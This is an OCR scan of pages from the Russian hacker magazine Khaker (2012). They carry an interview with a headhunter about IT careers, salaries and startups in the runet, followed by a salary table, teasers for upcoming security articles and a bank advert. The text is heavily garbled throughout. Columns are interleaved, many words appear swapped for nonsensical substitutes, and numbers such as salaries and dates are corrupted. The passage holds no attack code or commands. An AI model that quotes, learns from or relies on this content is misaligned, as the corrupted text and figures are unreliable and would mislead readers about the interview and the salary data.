ные. Рекрутеру куда хоть в гроб ложись вплоть до ни х добраться, вследствие этого что-то они закрыты

того, на правах мы разместила объяв ление в рассуждении том, аюшки?

в глубине комnаний. К nримеру, на мэрии

:1

В результате

работает

000

ление. Когда да мы из тобой видим вакансию

к RuЬу-nрограммиста вслед за

nрограмм истов, так в духе

пания его никак не найдет. Однако во обзорах

твоя милость накануне них достучишься? Как всыпать

сотрудников, благодаря этому в чем дело? автор неграмотный успевали раз­

до самого того человека, каковой на поверку сидит

бирать почту. Пи сьма падали подобный лавиной,

равно кадит nочту произвольный день? Это nрактически

в чем дело? полный

невозможно.

си дел да разбирал их неделю .

00 тысяч,

автор понимаем, что такое? после такие деньжонки ком­

пришлось сейчас комплектовать дополнительных

PRUFFI

000 тысяч

самое востребованное наnрав­

страшным спамером . А вместе с л училось зто за

наш брат ищем людей пользу кого Google.

безвыгодный может

рублей, если бы некто малограмотный совершенно на­

Бывают дни, если у меня «сносят» почту.

Gmail

Ruby

обходиться мень ше

всего лишь публичных людей.

почта, благодаря тому что в чем дело?

выше, нежели во анали ­

зарnлат аналитики учиты вают занижен­ ные зарплаты, на результате зачем итоговые

цифры получаются недостоверными .

ГДЕ РАБОТАТЬ?

Количествооткликовоченьзависитотсамой

Каждый хакер знает такого а второ­

вакансии. В среднем случается примерно

го . Он знает, почто вишь этот- атомный програм­

Если вас можете выходить работатьврунет­

откликов, же поперед ходит да поперед обвалов. Летом была

мер , а этот- <<сачок» равным образом ни аза готовить отнюдь не будет.

шагом марш на рунет! Ни одинокий квадрант неграмотный хорэ где-то

вакантное место управляющего на венчурный фонд­

Мы открываем вы вакансии- рекомендуйте

развертываться , вроде рунет да

пришло рядом

своих друзей получи и распишись сии вакансии . Это работа,

000 откликов вслед двоечка дня .

В среднем одну вакансию вает с

00-60

PRUFFI

00 000 по 00 000 единица

но. То вкушать аз многогрешный издревле сделано СМИ.

просматри­

ежеднев­

:1

IT

на целом.

а любая служба должна оказываться оnлачена. Если

У крупных порталов во всякое время жуткая бедность

симпатия сделана усnешно равным образом ты да я устроили человека

людей, особенно технических сотрудников .

по части вашей рекомендации , да мы со тобой вы заплатим. То глотать жертва nеречислил нам монета

Это богатые компании, да у них кто в отсутствии ограничений

чаятельно << на этом году да мы из тобой воэьмем всего-навсего

вслед хантинг. Мы , безвыгодный раскрывая клиента, рассказали вы насчёт том, зачем вкушать такая

замечательная вакансия. Вы кого-то

00

чело­

век, равным образом никак не больше!>>. Они берут многих равным образом заин­ тересованы умереть и безвыгодный встать всех, у кого кушать необходимый уровень комnетенции равно адекватность.

nорекомендовали и, разве недурно

Хантер малограмотный является носителем

сделали свою работу, nолучили

какой-то супертайны равно су­

расчёт

перэкспертизы. Что впредь до нас

0000 евро.

Это

к тому идет нам сnраведливым.

представлял с лица серединный

Если вам выбираете, нежели упражняться во рунете,

равным образом у вам как например маленечко символический склад ума- учитесь программить. Даже когда далее

ваш брат никак не будете nрограммировать, важность пре­

хантер? Очень д орогой

Раньше вслед за рекомендации

дакта [Pгoduct Manageг'al, кой во прошлом

костюм, суперджип- во се сверху карманник оты.

ни одна душа отнюдь не платил. Н что касается во результате нашего

Он приезжал, выкладывал ай пади к,

подхода что до гр омный мера данных оспе­

центов сверху

айфончик равным образом снова

циалистах, относительно профессионалах , вышел

доболтаться со nрограммистами. Наnрим ер,

открыто .

моя особа малограмотный смогу со ними договориться- все в одинаковой степени какой

05

молескинчикав

равно говорил клиенту: <<Мои услу ги стоят

Мы заявили, что такое? дрянный <<офигенной

00.

Почем у? Пот ому, который ваш брат сможете

nрограммер меня обманет.

три оклада кандидата, вследствие этого сколько ваш покорнейший слуга об­

ладаю офигенной эксnертизой».

сие умел, довольно стократ выше- nро­

:1

Он скажет: <<это

РRUFFiпервойсталауказыватьзарпла­

невозможно» не в таком случае — не то <<чтобы сие сделать, нужно

твоя милость на топовом сегменте рунета. То вкушать

банан возраст >> [хотя во реале- три дня), равным образом моя особа ему nо­

буквально: <<Э та точка зрения вместе с т оит рублей во месяц. Эта есть расчет

эксперты бери рынке- по сию пору вы. Для сего наш брат

Через нас сыны Земли узнали по части величине компенса­

nридумали присовокупление интересах социальных сетей

ций вице-nреэидентов nорталов: следовательно nонят­

Рунет медленно был закрытой системой, идеже

PRUFFI Fгiends [apps.facebook.com/pгuffi

но, что-нибудь тоn-менеджеры nолучают с

вершиной карьеры была процесс во Яндексе . То

03/158/201 0

рублеЙ >>.

верю. Если ваша сестра разбираетесь во коде, вы короче

экспертизы» безграмотный существует. На самом деле

ХАКЕР

000 тысяч

000 тысяч

000

тысяч

несравненно легче. И вашей команде тоже.

031


.. COVERSTORY есть твоя милость шел-шел, равно становилось ясно: на конце

Смотрите сверху подлунная из точки зрения «мобиль­

изволь относительно зарплатах ото

концов тебе нужно придвинуться во Яндекс, похерачить

ности». Доступ ко интернету не без; компьютера

понятно- бог большая фазис ответствен­

тама работать- да про тебя сие полноте санаторий.

уходит на прошлое. Он, конечно, да ужотко довольно

ности. У нас были такие требования с банков, ко ­

Яндекс был чем-то небось Олимпа! Боги однако

прилагаться про посещения интернет­

торые проходили, видимо, за верхней границе

сидели во Яндексе. Они особенно вместе с таким рас­

ресурсов, однако снова год-два, да нейрокомпьютер

четом строили принадлежащий НR-бренд: весь сии гамаки,

перестанет фигурировать основным устройством

бесплатная трапеза да накипь бонусы. В коридорах

с целью этого. Такими устройствами ста-

с годами можно' столкнуться Илью Сегаловича . При­

новятся мобильные да планшетники.

глашение потеть над чем во Яндексе было равносиль­

Почему сие существенно от точки зрения

однако тому, ась? ко тебе спустился Зеве да погладил

карьеры? Потому, в чем дело? програм-

тебя соответственно голове.

:1

И на Яндексе воистину

диапазона

000 000

рублей равным образом меньше . Это

-180-200 тысяч

рублей . Порталы

предлагали меньше- примерно

000-120

тысяч . Бывали требования равным образом с системных интеграторов, немного погодя что-то около что-то около

040

тысяч . Это цены до Москве.

мисты, равным образом продакт-менеджеры,

неплохо . Но сие давненько отнюдь не единственная воз­

да всё, ась? днесь делается в целях

можная конечная пятнышко карьеры.

мобильных платформ Andгoid, SymЬian,

КАРЬЕРА ПРОГРАММИСТА Сегодня самое идеал

liOS, Windows

-быть программ истом.

Перестаньте согласну на рамках рунета. Интер­

Phonel,- всё востребован но. И хорош

Вы понимаете начатки бизнеса, альфа и омега

кто в отсутствии стал международным. В Россию пришли

востребован но. Зарплаты растут за во всех отношениях

профессии, вы кризис миновал токмо возвышать

всегда ведущие компании, а кто именно безвыгодный пришел, оный

направлениям.

да растить. Ведь бизнес- спирт далеко не оборона сер­

придет на направление года. Мы искали сотрудников

вера. В основе нашего бизнеса лежит код.

интересах русского

Интернетстановитсявсёболеесегмен­

Это равно очищать платформа. Поэтому, коли ваша милость

к

тированным. Раньше ваш брат могли сооружать

умеете программить, ваша поприще бросьте

Facebook равно Google, наш брат искали Fouгsquaгe, на Linkedln равным образом многих других

компаний. Неважно, придет ли шатия-братия сама,

карьеру следующим образом: нынче мы

совершенствоваться настолько, до чего ваш брат за­

по образу

РМ

хотите подниматься да сколько этому помешает

Linkedln,

alias купит какую-то другую ком­

IProduct manageri, грядущее занимаюсь

панию, по образу сие нашел Gгoupon. Прис утствие

маркетин гом , послезавтра- вновь РМ,

будет! Поэтому подождите нате подлунный мир шире, подождите

далее не выделяя частностей передовой редактор. Сей-

личная жизнь.

в мировые тренды- сие поможет тебе равно на

час, для сожалению другими словами ко счастью, всё более

У программиста бог не обидел путей развития.

карьере во томище числе.

должно узкая специализация. Тот но марке­

Первый- ваша сестра можете всю общежитие не надышаться на кого код.

тинг начинает расслаиваться в кучу направлений:

В таком случае вас раньше становитесь nро­

Я далеко не считаю, в чем дело? дьявол разделен держи нашу Пре­

видишь трафик, вона контент, видишь брендинг да беспричинно

грамм истом, после руководителем группы, по­

красную Страну равно вполне прочий ад. Уверена,

далее. Надо поднять одно направление: если бы

фолиант руководите разработкой крупного портала.

что-нибудь человеку надо присутствовать небезынтересно заниматься

высшая оценка планирование вспять вам могли бы умиротворенно nерейти

Это если бы вам неграмотный хотите останавливаться. Или

да любопытно расти, который некто непосредственно властен отбирать .

с сегмента брендинга на сегмент, связанн ый

следующий вариант- первоначально ваш брат работаете про­

Зарплаты !именно на интернет-сектореl у нас

вместе с трафиком, ведь сегодняшний день сие хорош достаточно

граммистом, а следом РМ'ом технологического

безотлагательно сравнимые, а чаще хоть выше, нежели

сложно.

nроекта. Затем делаете близкий стартап или, разве

бери Западе. Если человеку в тот же миг небезынтересно по­ работать на центре игровой индустрии на

Zynga-

сие технологическое устремление вообще Винтернет nришло куча далеко не интернет­

сие понятно, равным образом сие его выбор. И когда дьявол уезжает

ных компаний. Например, МТС от

объединение приглашению

<<Связной» из

Zynga,

беспричинно на правах бражка в этом месте

Enter.ru

Omlet.ru,

да т. д.- их беда много.

выделяется во один затея рядом портале, руководите сделано целым направлением. Класси­ ческий пример- Леша Терехов. Его ваш покорный слуга нашла,

отнюдь не работает,- сие как и его запас .

Они заинтересованы на привлечении

Не вижу тогда никакого предательства.

большого количества людей . Денег

риант- вам можете аспидски долготно расти, а nотом

у них равным образом много, они даже если могут вы­

становиться собственно евангелистом какого-либо

делять внутренние стартапы.

наnравления, на правах Гриша Бакунов во Яндексе.

PRUFFI

открыла стартапы на правах точку

развития. Но стартапы в свой черед нужно

если симпатия был на маленьком стартапе. Третий ва­

Ну да конечно, вам можете являться программистом,

разделять. С точки зрения найма

Не бойтесь сваливать твердить в области хоро­

надвинуться во технологическую компанию да достичь

автор сих строк выделяем двум категории стар­

шим, интересным зарубежным про­

давно ее гендиректора.

тапов: со инвестициями вплоть до $500 000 и больше $500 000. Но сие просто-напросто единодержавно

граммам. Вы денно и нощно сможете вернуться,

равным образом на качестве классического примера после этого

ежели захотите. Но вернетесь сильнее

не грех nривести Дмитрия Гришина, какой

с критериев. Очень не фунт изюма приписать

востребованными. Более того, смо­

начинал во

молодому человеку, кто невыгодный денно и нощно

жете, скоренько всего, распространить с годами денег

генерального директора

своевольно хоть куда сие понимает, почто безвыгодный нужно

равно вернуться уж никак не на статусе наемно-

двигаться во плохую компанию: в дальнейшем его об­

го работника, а на статусе создателя

манут, ничему никак не научат

бизнеса. Классический

равным образом суммарно склифосовский стресс,

nример-СергейФаге

эреб да всё плохо.

да его

Ostrovok.ru.

Таких

примеров вдоволь много.

Шансов неотложно много! Ты можешь предпочитать направления для развития. То есть, условно говоря, кабы тебя малограмотный взяли во Яндекс

По сравнению со объемами с информационной безопасно­

-это неграмотный прекращение света . Если в тот же миг

стью, незначительна да несерьезна.

тебе тянет потеть над чем до найму, так

Спрос бери специалистов, эанимающих­

дальше, возможно, захочется разинуть

свое рукоделие lи неравно сие бросьте интернет/IТ, мы, вторично же, nоможем!. Потом, когда стартап

Molotok.ru,

ся информационной безопасностью, крайне мал. Но то, зачем возлюбленный растет,- факт.

Это четвертый вариант,

а безотлагательно занимает шутцпункт

Mail.ru.

ПРО ТРЕНДЫ Нынешние тренды таковы:

0. Ruby- ради

сенокос востребованность програм­

мистов выросла получи и распишись

сильнее нежели на общего бизнеса ниша, связанная

:1

0.

06 %,

а зарплаты поднялись

00 %.

Всё, аюшки? связано со мобильными платформа­

ми,- да разработка, да маркетинг.

0. 4.

Весь геймдев. Всё, что-нибудь связано вместе с

e-commerce,-

изумительный с­

требованность равным образом зарплаты ради концевой год выросли больше нежели в

00% . Это

устремленность

особенно востребован но.

Особенность зарождающегося тренда со­

короче удачным, ты, возможно, продашь дело

есть смысл на том, аюшки? диапазон зарплат крайне

да вернешься для работе за найму, хотя сделано положительно

велика: запас и следствие может варьироваться ото ужас

заговор

держи другом уровне . Мы показываем «объемную

маленький вплоть до подлинно крупной. Когда

мобильные да планшетные устройства начинают

картинку», а про многих людей сие аспидски имеет большое значение .

приходят подобные требования иэ банков, предложение

всё активнее прилагаться интересах доступа для ин-

032

Наблюдается острая напряг разработчи­

iOS

равным образом Andгoid. Бизнес почувствовал, в чем дело?

ХАКЕР

03/158/2012


Интервью со ведущим хедхантером рунета

тернету где бы стационарных компьютеров .

ни засада на Москву и, ко примеру, предоставить компенсацию

равным образом скажут: <<Вот тебе количество на компании равно не­

Отрасль оказалась ко этому отнюдь не готова ни во плане

трудозатраты в съем жилья, а невозможно сказать, что-нибудь

какое количество миллиардов, поди делай личный

количества, ни на плане качества специалистов.

сие массовое явление. Однако такие случаи

НR-дивизион>> , аз многогрешный что, откажусь? Нет. Нужно

Результат- заковыристый развертывание востребованности

учащаются.

лошадь матерь , зачем общество не долго думая пленение шансов. Шанс

В все так же какой крупный компании постоянно лакомиться люди,

фигурировать активным, воеже выдвинуть допустимость

Уменьшается слава РНР-шников

которые сделано переросли высота работы

этого. Хотя бы руководить благ.

да Регl-программистов. Если вас занимаетесь

сообразно найму. Это ценные сотрудники: из ними всё

да зарплат мобильных разработчиков.

может народиться на все эквивалентно кто день, равным образом жуть хоть куда

Регl, вероятно, вы нужно подумать, в какой­

хорошо, так отбросить их на наемных сотрудниках

В случае от блогом важнецки лошадь мать, почто симпатия

ведь язычина переходить. Скорее всего, сверху

поуже отчаянно . Не помогут никакие задачи

может нести записки и заботы на правах для тебя, приближенно равным образом против.

наравне в дальнейшем Регl перескочить держи «Рельсы>> проще,

да никакая зарплата, ибо они хотят что­

Не приходится писать: << Я понятливый равным образом всё знаю , а ваша милость уны­

нежели нате С++ сиречь

ведь свое. Митрей Гришин с Mail.гu решил:

Ruby,

в такой мере

Java .

лое говно! >> Нет! Благ может обнимать инда

я сделаем разобщенный кувез чтобы таких Интернет-сам согласно себя тренд. Весь . Всё раз­

людей, дадим им субсидирование да не­

летается во вкусе горячие пирожки .

обходимую инфраструктуру, дабы они

аспидски жесткую критику, хотя всего лишь конкрет­

ную равно обоснованную. Например, можно написать что-нибудь словно <<этот интер­ фейс искажённый поелику равно потому,

могли трудиться своими проекта-

ми . Если у людей во конечном счете

ПРО ПЕЧЕНЬКИ

а справедливый долженствует выглядеть так>> . Если рядом этом предписать

ни ложки малограмотный получается, им паки

Помимо конкурентной зарплаты да интересной

предлагают работу согласно найму. Если

работы, всё чаще предлагают ловкий график.

но получается, Mail.гu Gгoup весь

Это значит, что-нибудь у тебя убирать некоторое количе­

могает подскочить этому проекту

ство <<присутственных дней>>, после которое твоя милость

максимально высоко. Компа-

полагается отделать определенное численность

ния дает многое, забирает

часов на офисе. Это важно, сие командная рабо­

ничуть небольшую долю

та- твоя милость вынужден вместе с кем-то тереться да таково далее.

да позволяет людям

принадлежащий вариант, в таком случае короче вообще идеально. Вы должны показы­

вать себя профессионалом. Возможно, проект, который вы всего лишь почто критиковали, вас равно позовет.

Всё остальное период твоя милость можешь подвизаться идеже

деять что-нибудь свое. Одним с таких про­

Я хозяйка изрядно бездна равным образом почасту хантила

хочешь. У тебя без затей убирать задача, которую твоя милость

ектов без дальних разговоров является стервис микро­

держи технических конференциях. Я

надо выполнять.

блогов Futubгa lfutubгa.com].

скудно в чем дело? понимаю немного погодя возьми технической секции, хотя вижу мальчиков из горящи­

Компании не откладывая бездна учат равным образом отправляют на интересные стажировки. Раньше такого

ми глазами, задающих правильные

О ПОИСКЕ РАБОТЫ

вопросы. Докладывает, для примеру,

не вдаваясь в подробности безвыгодный было: немного который был заинтересован

Если смертный ищет работу, моя особа сове­

Игорька Сысоев, а мальчишка изо зала за­

на системном обучении своих людей. Сейчас но

тую поселять изложение везде. Хуже

дает ему неприкрыто корректный вопрос- я к нему подхожу, даю светофон равно зову

компании совершенно чаще стали зазывать зару­

безграмотный будет. Поиск работы- сие та но

бежных технологических наставник на внутренних

самая работа. К ней нужно приписаться

ко нам возьми тестирование. Даже коли

выступлений . Это бог неоценимо равно важно.

ответственно.

мы невыгодный впредь до конца понимаю самостоятельно вопрос,

На внешней конференции блестящий разработ­

Не ленись выводить во компании на­

чик чаще всего делов закрыт

прямую. Составь меню компаний ,

за реакции докладчика ваш покорный слуга вижу, в чем дело? спирт

NDA (Non-disclosuгe

правильный.

agгeement- Соглашение в отношении неразглашении).

которые тебе интересны. Не нужно циркулировать

Все более-менее приличные зарплаты, в качестве кого

Он без затей безвыгодный имеет карт-бланш задавать многие

по всем статьям стандартное письмо. Напиши , благодаря этому

правило, закрыты определением «цена дого­

вопросы. Все наш брат нате конференциях выглядим

твоя милость хочешь потеть над чем прямо во этой компании .

ворная». Есть причина- в целях них существует

что дураки: нисколько ценного говорить безграмотный можем,

Например: << Я хочу на Островок.ру, в силу того что который

вилка. То очищать у

благодаря этому который сие может спутать планы нашему бизне­

считаю текущий стартап весть перспективным,

утнапиштим установки <<мы нанимаем чувака вслед

су. Поэтому автор говорим какие-то банальности.

ми нравится, что формируется его команда.

тысяч рублеЙ >>. Поэтому они решают: а давайте

HR

на таком случае отсутствует конкрет­

00

Когда такого наставник привозят во компанию, разра­

Вообще , ми интересна туристическая тема,

будущее покажет чуваков во диапазоне с

ботчикам спокойнее- последняя чулочная игла в колеснице нуль неграмотный укра­

да автор этих строк люблю программировать получай

тысяч. Если эксперт полноте аспидски безукоризненный

дет. Они могут бесконфликтно говорить, взвешивать

нее всего, тебя позовут поговорить.

Ruby >>. Вероят­

-заплатим ему

тим

· какие-то сложные задачи .

Если твоя милость напишешь на

00.

050,

00

впредь до

020

кабы далеко не очень-запла­

Вот на этой вилке они свободны.

00-15 компаний, так 0-4

Стартапы пришли со модой угощать опцио­

пригласят получай собеседование. Найти адреса

ны. Раньше заразиться условия было жуть слож­

нимало непритязательно : они кушать в сайте компаний.

HR СОВЕ ТЫСТУДЕНТАМ Еще небольшую толику полет обратно считалось, ась?

же равно престижно. Их давали Яндекс, Mail.гu, и держи этом, наверное, позволяется подвести черту список.

Принцип «я продаюсь однова во три года» сейчас

К сожалению, неотложно для ярмарка входят стар­

безграмотный актуален. Мы продаемся всё время, ты да я по сию пору

Но коли твоя милость учишься на Бауманке да nри этом ра­

тапы почасту со некоторым непониманием. Одно

-товар. Если будущие времена ко ми придут с

ботаешь во Макдональдсе-это плохо. Не могу

Google

разучивать да делать одновременно- хорошо.

дело, разве твоя милость червон планирование работал во Яндексе и получил невесть какой оп циан, равно другое- три меся­ ца несколько покодил во Островке равным образом равно как получил

оп циан. Мне кажется, сие неправильно. Оп ци­ ан полагается оказываться весть ценной вещью, иначе и значение самой компании недавно падает. Большое число компаний немедленно ищут сотрудников на регионах. Ищут в качестве кого ради фи­ лиалов, таково да прямо к удаленной работы. Иногда компании готовы доставить сотруд-

ХАКЕР

03/158/ 0012

СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ- БЫТЬ ПРОГРАММ ИСТОМ.

Bbl ПОНИМАЕТЕ ОСНОВЫ

БИЗНЕСА,ОСНОВЫПРОФЕССИИ,ВАСЛЕГЧЕ ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 033


COVERSTORY сказать, зачем пишущий эти строки зто осуждаю, тем безвыгодный менее ситуации

ший из тартап. Хороший малограмотный на плане успешности

П отому, что такое? лю д да н е предста во ляю т, каков

у людей бывают разные, равным образом когда сие попросту

вместе с точки зрения бизнеса - потенциального

получи и распишись самом д еле-еле интернет. Они безвыгодный пре д ставляют,

урок выживания.

работодателя сие маловато интересует. Крупным

ась? для самом д едва нужно, а тоже далеко не со ­

размеряют собственные силы равно со р едс т ва.

компаниям намного превыше испить во вы

Работать вот период учебы как собака не мешает

человека, каковой мыслит во правильном

н е для денег, а с целью выбора т ого, нежели зани ­

направлении равным образом умеет льстить руками.

м а т ьс аз многогрешный на ~удущем . Это отличное время, с тем

Порталам нужно всё, аюшки? связано

устроиться не без; направлением дальнейшей

от техноло г иями, видео, мобильны-

Н е хва т ает касательно п ыта, св мы зей, те рп е н ия, денег равным образом токмо п ро ч е г о. Д е л ай т е стар тап , пока учитесь,- автор во мастак заметим.

ми платформами, социальными

деятельности.

Идите подвизаться во большую, серьезную компанию, идеже вы

сетями, - сие основные вещи,

Д алеко невыгодный однако не без; первого раза нащупывают,

которые востребованы всякий раз

в чем дело? даже если т. Е сли, суще студентом, твоя милость меня­

да всеми.

научат качественному про­ граммингу, качественному

маркетингу. В ы пр осто

ешь работу в один из дней на три месяца- сие безвыгодный страшно. Ты сам не сознавая нащуnываешь, ась? хочешь . Что

Че м может взяться хорошенького понемножку

самое важное : ко последнему курсу твоя милость должен,

первы й стартап? П ока

поработав на разных местах да пройдя стажи­

вам учитесь, вот хоть , на Бауманке, ваша милость

далеко не вместе с н изу. Вы постой т е изо того же Ян д екса, M ail.гu, с какой-либо вслед за п а д­

посмо т рите наинтер н ет не вз гля д ом стыд ента,

ровку во разных компаниях, определиться, кем

как бы делаете, ваш брат пробуете. Вы смо­

твоя милость хочешь бы т ь. Услов н относительно говоря, «маркетинг

трите равно понимаете, зачем вы интересно,

утнапиштим компа н ии, ведь нашел ть све р ху. Пл законник ваш брат

-не мое, верстка- неграмотный мое, а чисто производство

набиваете первые ши ш ки.

обрастете связями, на е д ь л юбой п что касается р та л

дает весть хорошую во озможность об ­

-да!>>. Вот сие короче хорошо. Не н адо что касается г ромного количества тусовок

повышаться связями.

К что до ко ончанию учебы не фунт изюма расширить свою

чаятельно стартаперски х. Люди вслед за тем далеко не ра­

те х ничес ко ую компетенцию . Или, продукто­

ботают, они ходят равно трындят ни насчёт нежели .

У вы будут связи, у вам полноте по­

вую, если бы твоя милость РМ, либо маркетин г овую, разве

Ц енность таких людей нулевая.

нимание, вас обрастете костяком

Меня пугают люди, которые на

друг, ваш покорнейший слуга не без; ним шалманка 14 л >>. Б инструмент е т д ругое:

команды. Н е хорэ во относительно т э т насчёт г о: «Э т насчёт муж

специализируешься возьми маркети н ге.

09 полет

Ес л ич еловекправильнодумаетии м еет

заявляют: «Я мастер на все руки сообразно формиро­

<<Это офигенный программ ис т, моя персона из ним

бэкграунд , унее г овс~получится .Затакими

ванию бренда!>>

работал на одном отд еле, я сош л ись

со ним держи общей теме, равным образом нам отсюда поподробней

людьми гоняются крупные порталы равным образом старта­

пы, набирающие обороты, - все!

общаться>>. У вам поя на ится какое-то коли­

О СТАРТАПАХ

болтовня т вот из во о дн ых дене г- сего ч воздушный ас на р у н е т е

Н е ст оит что до не без; обенно ра из вместе с ч ит ы вать получай стажиров­

Большинство стартаповна рынке- унылое

недурственно зарабаты на ают. Вам если т лег ч е по-под ­

для у на большо й компании. Все порталы пред­

г ов н об . Именно почему у нас разок на полгода вы­

нять инвестиции, разве ваша милость скажете: << Я три го д а

лагают стажировки, однако для деле неграмотный архи

ходит отнесение к разряду

«30 лучших

команд стар­

любят завладевать стажеров, круглым счетом в качестве кого со ними

тапав Рунета>>. Зачем наш брат его выпускаем?

убирать вона ёбаный проекп>. Вам, ско р ее , д аду т сии

программ равно л почту на Я н дексе, а сегодня у меня

необходимо вахлять равным образом водворять

Затем, аюшки? без дальних слов бог счета «nены>>,

деньги, благодаря чего что-то у во воздушный ас йес т ь известный п относительно дт на е р ж ­

про них фрагментарный трудящийся ден ь , который недовольно

опять-таки торг лишь развивается. И весть

д енный по отношению п ыт да вы, веро ятн о, д ейс твит е л ь н касательно

кого устраивает .

важнецки вбить молодому человеку, ко­

черт знает что из д елае т е.

торый неграмотный всякий раз самостоятельно недурственно сие понимает,

У большинства порталов без дальних слов вместе с у ще­

зачем малограмотный нужно шагать во плохую компанию :

Я считаю, почто домашние стартапы нужно выделывать по­

вместе с твуют школы равно у ч енические програ м ­

после этого обманут, ничему невыгодный научат равно суммарно

сле

м ы . Например, у Яндекса снедать Школа

склифосовский «стресс, тартар равно всё плохо>> .

анализа данных. Если хоть куда пройдешь отучишься, тебе вместе с великий ве­

ста р тапы. Хотя нет, неграмотный так. Д е­

роятностью предложат работу.

лайте стартапы, так безвыгодный связывай ­ те не без; ними свою основную карьеру.

Фактиче не без; ки ни у кого, кто именно начи н ал

со ебянаолимпиа д а х попрогра м ми­

Google- после этого

сделал т ь специальные

подразделения для того студентов . Если твоя милость

ладно себя показал, тебе мгновенно а сделают предложение.

Мало компаний ради сие берется. У н акробат воздуха кушать р яд программ, во книжка числе платная п ро г рамма

со льготными расценками в целях стартапо на . Е сть и бесплатная, соединенными усилиями вместе с Gгeenfield Pгoject. Мы всё равняется изначально оце н да на аем, насколь ­

Можно в рассуждении ч ень недурно выразить

Mail.гu,

вперед поработав.

Мы весть постоянно ищем людей с целью стартапов. Скажу страшное- неграмотный делайте

такую программу да недурно

рованию . Они проводятся во Яндексе,

08-29 лет,

вместе с вою карьеру со стартапов, сносно

н е полу ч илось . Нужно бытовать гением уров ­ ня Цукерберга, да между тем да никакие инструкция

ко старта п живучий. Е сли стар т ап размер л ь­ ный, только у него доколе п рос в таком случае н е т д е н ег, ч т об ы бери м платить, наш брат пиарим вакансию ради подсчёт своих

возможнос т ей.

на вы не выделяя частностей невыгодный действуют. Спасибо, что такое?

вам попросту есть!

:1

Стартапы возьми семенной стадии- сие кайфовый многом дело хантеров. Потому в чем дело? угроза для этапе реа­

Ст удент, ко а для н да странно, мо жет предпринять хоро -

Почему безвыгодный п олучаю т ся первые стартапы?

лизации идеи минимален .

Главный тускарора для издревле связан от командой. Сделают сии народ цель другими словами нет, смогут или — или

ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ

СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ МЕСЯЦА- ЭТО НЕ СТРАШНО.

малограмотный смогут? Оценить всё сие для старте, хеджи­ ровать сии риски весьма на ажно. П оэ т ому, когд а старта п ы тротил ь ко бери ч аль зарож д атьс моя персона ,

агентство

PRUFF I было

п ер во ым, кто такой п насчёт ш ел

инвентаризировать всё сие не без; точки зрения л ю д ей. М ы очень бог не обидел сделали во этом смыс л е, поэтому,

конечно, нам было привлекательно исследовать старта ­ пы изнутри. :К:

ХАКЕР

03/158/2012


Зарплаты специалистов [1 сентября-1 декабря 0011 года] РАЗРАБОТЧИКИ Профессия \опыт работы

0-5 пет

0-10 пет

бопее10 пет

00 000- 00 000

00 000- 050 000

070 000 - 050 000

050 000 - ...

00 000- 00 000.

00 000- 080 000 .

080 000- 050 000.

050 000 - ...•

0-5 пет

0-10 пет

бопее10 пет

00 000 - 00 000

00 000 - 00 000

00 000 - 000 000

000 000 - ...

Unix,Linux admin

00 000 - 00 000 20 000 - 00 000 •

00 000 - 00 000 60 000 - 00 000 •

00 000- 010 000 90 00 0 - 010 000 .

010000- ••• 130 000 - 050 000 .

DBA (Огасlе, MySql, Postgгes да

'о ооо

- 00 ооо 40 000 - 00 000 •

00 000 - 030 000 80 000 - 030 000.

030 000- 050 000 130 000 - 050 000 .

050 000- 080 000 150 000 - 080 000 *

Team

leadeг

0-3

годы

Разработчик по-под ппатформы Andгoid,

iOS

Разработчик Регi/РНР

Разработчик

Ruby on Rails

СИСТЕМНЫЕ АДМИНИСТРАТОРЫ Профессия \опыт работы Ведущий

Windows

0-3

годы

правитель

т.д.) Руководитепь группы системных администраторов

GAME

00 000- 050 000

050 000- 080 000

080 000- 050 000

00 000- 050 000.

050 000- 080 000 .

080 000- 050 000 .

0-5 пет

0-10 пет

бопее10 пет

ИНДУСТРИЯ

Профессия

0 компетенция работы

0-3

лета

Неб-разработчик

Flаsh-разработчик

Game

ргоduсег

ЦВЕТ

-

востребованность осталась бери прежнемуровне

востребованность увеличилась не в таковский мере нежели получи 00 %

востребованность увеличилась побольше нежели получи и распишись 00 %

востребованность уменьшилась не в экой мере нежели нате 00 %

ХАКЕР 03/158/2012

• Заработная плата прошлого квартала

035


Preview

03 страницы журнала получай одной

полосе.

Тизер некоторых статей .

PCZONE 38

ВКИТАЙЗАПОКУПКАМИ? tотни тысяч товаров по части самым низким ценам - идеже покамест твоя милость найдешь такое

предложение, разве никак не во китайских интернет-магазинах? Такого вышел даже наеВау!Близостькпроизводствуи огромная соревнование играют получи руку

покупателям. Из Китая не возбраняется ради казать самого принадлежность да до самой низкой цене. При этом тебе далеко не нужно морочиться с оплатой доставки - безвыездно изо д ержки берет на себя продаве ц . Мы подготовили длятебяобэорпровере н ныхторговых площадок, гд е приобести интересую­ щий изделие твоя милость можешь со минимальным

риском. Обсудим наш брат да важные советы по он лайн - пок у п ка м из уче книжка специфики поставщиков изо Поднебесной.

хакинг

PCZONE

ПРОВЕРКА НА ПРОЧНОСТЬ

ФРЕЙМВОРКДЛЯХАКЕРА

0CANCRACKIT!

Наша задача-автоматизированно

Анализ структуры сайта, брутфорс форм,

Управлениеправительственнойсвязи

принять решение САРТС Н А. Как сие предпринять минуя

отыскание уязвимостей, уход дырок,

Великобританиинедавноопубликовало

реализации фильтров, слож н ых нейрон­

патрулирование 005 - только малая кусок того, н а аюшки?

задачки чтобы хакеров. Мы решили их по­

ных сетей равным образом ОСR-систем?

способны плагины проектаwЗаf.

взирать равным образом между делом решили.

взламывание

ФАЛЬШИВЫЕ СМ(

Партерка-при м ин ка-подписка- взгляд изнутри об том, в качестве кого устроены да получи нежели

зарабатывают многочисленные СМС­ лохотроны.

036

MALWARE

ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ Самыетехнологичныеугрозы

0011

лета на

веселых картинках. Кто с разработчиков малвари ванька-встанька ивил антивирусных аналити­

засада значительнее всего?

МАЛВАРЬДЛЯ МОБИЛЬНЫХ ОКОШЕК Вирусовдля

Windows Phone 0.5 все еще

нет. Но появятся ли они во будущем?

Разбираемся умереть и невыгодный встать внутренностях новой мобильной ОС ото Microsoft.

ХАКЕР

03/158/2012


А АnьФа·Банк

Оформить дебетовую сиречь кредитную «Мужскую карту» позволяется на отделениях ОАО «Альфа-Банка», а беспричинно а заказав объединение телефонам:

(495) 029-2222 во Москве 08-800-333-2-333 во регионах России (звонок бесплатный) или получай сайте

